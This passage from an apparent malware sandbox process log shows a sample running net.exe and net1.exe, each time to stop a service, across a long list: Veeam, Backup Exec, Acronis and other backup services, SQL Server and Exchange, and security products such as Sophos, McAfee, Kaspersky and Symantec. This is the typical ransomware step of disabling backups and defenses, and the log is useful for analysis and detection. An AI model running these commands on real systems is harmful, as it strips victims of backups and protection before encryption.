C:\Windows\system32\net1 stop FA_Scheduler /y
4⤵
PID:4008

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:2956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:4000

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
3⤵
PID:2968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
4⤵
PID:4032

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:2996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
4⤵
PID:4024

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:3004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
4⤵
PID:4712

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
3⤵
PID:3060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
4⤵
PID:4776

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
3⤵
PID:2272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
4⤵
PID:4824

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
3⤵
PID:2280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
4⤵
PID:4840

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
3⤵
PID:2380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
4⤵
PID:4752

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
3⤵
PID:1816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
4⤵
PID:4800

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:2472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
4⤵
PID:4832

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:2448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:4760

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:2404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:4768

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
3⤵
PID:2324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
4⤵
PID:4744

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:2356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:4792

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
3⤵
PID:2052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
4⤵
PID:4728

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
3⤵
PID:2232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
4⤵
PID:4736

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
3⤵
PID:1328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
4⤵
PID:4816

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:1332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:4720

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
3⤵
PID:1104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
4⤵
PID:4436

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
3⤵
PID:2864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
4⤵
PID:4956

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
3⤵
PID:2856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
4⤵
PID:4940

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:2016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:4948

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
3⤵
PID:3024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
4⤵
PID:4864

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
3⤵
PID:2056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
4⤵
PID:5004

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
3⤵
PID:1784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
4⤵
PID:4908

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:3044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
4⤵
PID:4932

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:2952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
4⤵
PID:4444

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:2876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
4⤵
PID:4980

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
3⤵
PID:2844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
4⤵
PID:4964

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
3⤵
PID:1484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
4⤵
PID:4972

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:1760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:4492

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:1088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:4996

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
3⤵
PID:1896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
4⤵
PID:4704

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:2480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
4⤵
PID:4892

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
3⤵
PID:2476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
4⤵
PID:4900

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
3⤵
PID:1276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
4⤵
PID:4924

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
3⤵
PID:2796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
4⤵
PID:5012

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
3⤵
PID:2692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
4⤵
PID:4916

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:2128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
4⤵
PID:5092

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
3⤵
PID:3280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
4⤵
PID:4296

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:3368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
4⤵
PID:5084

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
3⤵
PID:3440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
4⤵
PID:5108

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:3524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:5068

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
3⤵
PID:3620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
4⤵
PID:4160

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:3612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
4⤵
PID:5020

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
3⤵
PID:3604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
4⤵
PID:5028

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
3⤵
PID:3596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
4⤵
PID:5036

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
3⤵
PID:3588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
4⤵
PID:2020

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
3⤵
PID:3580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
4⤵
PID:1580

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
3⤵
PID:3548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
4⤵
PID:920

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:3532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
4⤵
PID:1352

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
3⤵
PID:3516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
4⤵
PID:964

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
3⤵
PID:3508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
4⤵
PID:5060

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
3⤵
PID:3500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
4⤵
PID:948

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
3⤵
PID:3492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
4⤵
PID:5100

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
3⤵
PID:3468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
4⤵
PID:5076

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
3⤵
PID:3448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
4⤵
PID:5116

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
3⤵
PID:3432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
4⤵
PID:4248

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
3⤵
PID:3424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
4⤵
PID:5044

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
3⤵
PID:3416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
4⤵
PID:4256

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
3⤵
PID:3408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
4⤵
PID:4988

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
3⤵
PID:3384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
4⤵
PID:976

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
3⤵
PID:3328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
4⤵
PID:1672

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
3⤵
PID:3308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
4⤵
PID:5052

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
3⤵
PID:3864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
4⤵
PID:4456

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
3⤵
PID:3932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
4⤵
PID:4552

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:3948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
4⤵
PID:4684

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
3⤵
PID:3908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
4⤵
PID:4652

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
3⤵
PID:3972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
4⤵
PID:956

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:3988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
4⤵
PID:1212

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:4072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
4⤵
PID:3928

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
3⤵
PID:4080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
4⤵
PID:4316

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
3⤵
PID:2144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
4⤵
PID:5212

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
3⤵
PID:3140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
4⤵
PID:4348

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:3192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
4⤵
PID:4356

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
3⤵
PID:2100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
4⤵
PID:4512

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:2076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
4⤵
PID:4340

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
3⤵
PID:3248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
4⤵
PID:4624

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
3⤵
PID:1180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
4⤵
PID:4568

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:1616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
4⤵
PID:4672

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
3⤵
PID:1100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
4⤵
PID:4688

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
3⤵
PID:3404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
4⤵
PID:5188

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
3⤵
PID:3464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
4⤵
PID:5124

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
3⤵
PID:3396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
4⤵
PID:4384

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:1804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
4⤵
PID:2120

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
3⤵
PID:2312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
4⤵
PID:928

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
3⤵
PID:1028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
4⤵
PID:2176

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
3⤵
PID:3852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
4⤵
PID:5204

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
3⤵
PID:2040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
4⤵
PID:916

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
3⤵
PID:2132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
4⤵
PID:5324

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
3⤵
PID:340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
4⤵
PID:1336

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
3⤵
PID:3944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
4⤵
PID:5140

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
3⤵
PID:2148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
4⤵
PID:4680

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
3⤵
PID:3168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
4⤵
PID:5148

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
3⤵
PID:2168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
4⤵
PID:5132

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
3⤵
PID:2156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
4⤵
PID:5196

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
3⤵
PID:3576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
4⤵
PID:5180

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:3364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
4⤵
PID:5164

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
3⤵
PID:4104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
4⤵
PID:5252

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
3⤵
PID:4124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
4⤵
PID:5292

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
3⤵
PID:4136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
4⤵
PID:5156

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
3⤵
PID:4148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
4⤵
PID:5220

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
3⤵
PID:4164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
4⤵
PID:5268

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
3⤵
PID:4176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
4⤵
PID:5172

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
3⤵
PID:4184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
4⤵
PID:5276

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
3⤵
PID:4208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
4⤵
PID:5244

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
3⤵
PID:4200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
4⤵
PID:5236

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
3⤵
PID:4220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
4⤵
PID:5260

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
3⤵
PID:4360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
4⤵
PID:5228

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
3⤵
PID:4372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
4⤵
PID:5284

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
3⤵
PID:4428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
4⤵
PID:5300

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
3⤵
PID:4476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
4⤵
PID:5364

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
3⤵
PID:4500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
4⤵
PID:5348

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
3⤵
PID:4516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
4⤵
PID:5356

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
3⤵
PID:4540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
4⤵
PID:5388

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
3⤵
PID:4580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
4⤵
PID:5316

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
3⤵
PID:4608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
4⤵
PID:5380

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
3⤵
PID:4588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
4⤵
PID:5308

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
3⤵
PID:4628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
4⤵
PID:5372

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
3⤵
PID:4644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
4⤵
PID:5340

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
3⤵
PID:4532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
4⤵
PID:5332

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:4784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:5416

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
3⤵
PID:5396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
4⤵
PID:976

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
3⤵
PID:5428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
4⤵
PID:4728

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:5448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
4⤵
PID:3104

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
3⤵
PID:5468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
4⤵
PID:3812

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
3⤵
PID:5484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
4⤵
PID:4332

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
3⤵
PID:5500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
4⤵
PID:3268

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:5516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:3592

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
3⤵
PID:5552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
4⤵
PID:2820

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
3⤵
PID:5576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
4⤵
PID:2344

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
3⤵
PID:5536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
4⤵
PID:2180

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
3⤵
PID:5608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
4⤵
PID:2100

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
3⤵
PID:5596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
4⤵
PID:2176

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
3⤵
PID:5624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
4⤵
PID:3992

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
3⤵
PID:5508

C:\Windows\SysWOW64\net1.exe
